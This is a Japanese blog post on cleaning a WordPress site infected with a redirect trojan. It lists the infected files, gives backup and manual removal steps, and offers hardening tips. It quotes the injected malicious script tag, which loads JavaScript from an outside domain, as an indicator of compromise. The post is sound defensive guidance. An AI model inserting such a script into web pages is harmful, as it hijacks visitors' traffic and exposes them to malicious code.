
WordPressは多くの外国貿易向け独立サイトの第一選択肢であり、全世界のウェブサイトの35%がWordPressを使用しています。エコシステムが成熟しており、PluginやThemeも非常に豊富です。そのため、WordPressのセキュリティも重要です。今日、ある外国貿易向けサイトが正常にアクセスできず、サイトを開くと他のスパムサイトにリダイレクトされてしまいました。明らかにウイルスに感染し、悪意のあるリダイレクトが行われています。Naibaはここに記録します。他のサイトへの悪意のあるリダイレクトを行うWordPressウイルス・トロイの木馬スクリプトをどのように駆除するか。
ウイルスの状態
この悪意のあるリダイレクトウイルス自体は、サイトデータに直接的な損害を与えるものではありませんが、悪意のあるスクリプトを挿入してサイトを開けなくし、サイトのトラフィックをハイジャックして他のサイトにリダイレクトし、ユーザーを騙してブラウザ通知を許可させた後、ブラウザに広告をポップアップ表示することで利益を得ます。(もしあなたがちょうど被害に遭った場合は、Windows10システム右下のChromeポップアップ広告を閉じる方法)
ウイルスの原理
このウイルスの仕組みは、何らかの脆弱性を利用してサイトの一部のファイルデータ(一部のトロイの木馬はデータベースにも挿入)を改ざんし、悪意のあるスクリプトを挿入します。ユーザーがサイトにアクセスすると、スクリプトが実行され、自動的にトラフィックをハイジャックして悪意のあるサイトにリダイレクトします。
Naibaが今日遭遇したこのトロイの木馬スクリプトは、サイトに以下のスクリプトを挿入していました:
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
悪意のあるスクリプトは、サイト上のいくつかのファイルに挿入されています。例えば以下のファイルです(これらだけではありません):
- index.php
- wp-config.php
- wp-settings.php
- wp-load.php
- .htaccess
Themeファイル (wp-content/themes/{themeName}/)
- footer.php
- header.php
- functions.php
一部のPluginのファイルも汚染されることがあります。
駆除方法
Naibaが今日遭遇したこのトロイの木馬は、サイトファイルデータを変更しただけでなく、同時にデータベースも汚染していました。そのため、ファイルとデータベースのウイルスを同時に駆除する必要があり、サイトを正常に復元できます。
方法1:ウェブサイトのバックアップデータを使用して復元する
バックアップの習慣があれば、以前にバックアップしたサイトのデータベースとファイルを直接復元できます。これが最も迅速な解決策です。
関連記事:
- BackWPupを使用して自社サイトのデータベースとファイルをバックアップするチュートリアル
- データ損失を防ぐ 10の優れたWordPressバックアッププラグインの推奨
- WordPressバックアップ・復元プラグインAll-in-One WP Migration使用チュートリアル
方法2:手動でトロイの木馬スクリプトを削除する
バックアップがない場合は、手動でトロイの木馬スクリプトをクリーンアップする必要があるため、より面倒です。
1. ファイルマネージャー(cPanel、宝塔パネル、FTPなど)を使用してサイトのルートディレクトリにアクセスし、index.phpを開きます。ファイルの先頭に悪意のあるスクリプトが挿入されているのがわかります(下図参照)。
Themeファイルをチェックすると、以下のコードが挿入されているのがわかります:
2. サイト上の感染したすべてのファイルを削除します。
もちろん、すべてのファイルを一つ一つチェックして削除するのは大変な作業です。そのため、アップロードフォルダを残して、他のフォルダはすべて削除し、最新のWordPressインストールパッケージをダウンロード上書きアップロードします。
3. 安全なサイトファイルをサーバーにアップロードします。
4. データベースのバックエンドにアクセスし、汚染されたデータベースの内容をクリーンアップします。

上の図はデータベース内で見つかった悪意のあるスクリプトデータです。手動で削除する必要があります。
5. Wordfenceをインストールして、サイトファイルに漏れがないかスキャンします。
これで、サイト上の悪意のあるスクリプトファイルはクリーンアップされ、サイトは正常にアクセスできるようになります。
セキュリティ保護
ウイルスの除去が完了しました。再びハッキングされるのを防ぐために、WordPressのセキュリティ対策を行う必要があります。Naibaが皆さんにまとめた経験則は以下の通りです:
- 管理者アカウントには必ず安全なパスワードを設定し、できればWordPressが自動生成するような高強度のパスワードを使用してください。
- WordPressのバージョンとPluginのバージョンを最新に保ちましょう。多くの外国貿易向け独立サイトは決して更新されず、脆弱性のあるバージョンに遭遇してしまうのは避けられません。
- 出所不明のThemeやPluginはインストールしないでください。クラック版は安全性が保証されていない場合、インストールしないのが最善です。
- サーバーのセキュリティも考慮する必要があります。サーバーソフトウェアのバージョンを最新に保ち、安全なパスワードを使用してください。
- セキュリティPluginをインストールすることもできますが、経験上、強力なウイルスに遭遇した場合、セキュリティPluginも無力です。
したがって、最も安全な方法はパスワードを安全に保ち、プラグインやテーマをむやみにインストールせず、バージョンを常に最新に保つことです。
最後に、サイトからマルウェアがまだ除去されていない場合は、Naiba に有料で対応を依頼することもできます。



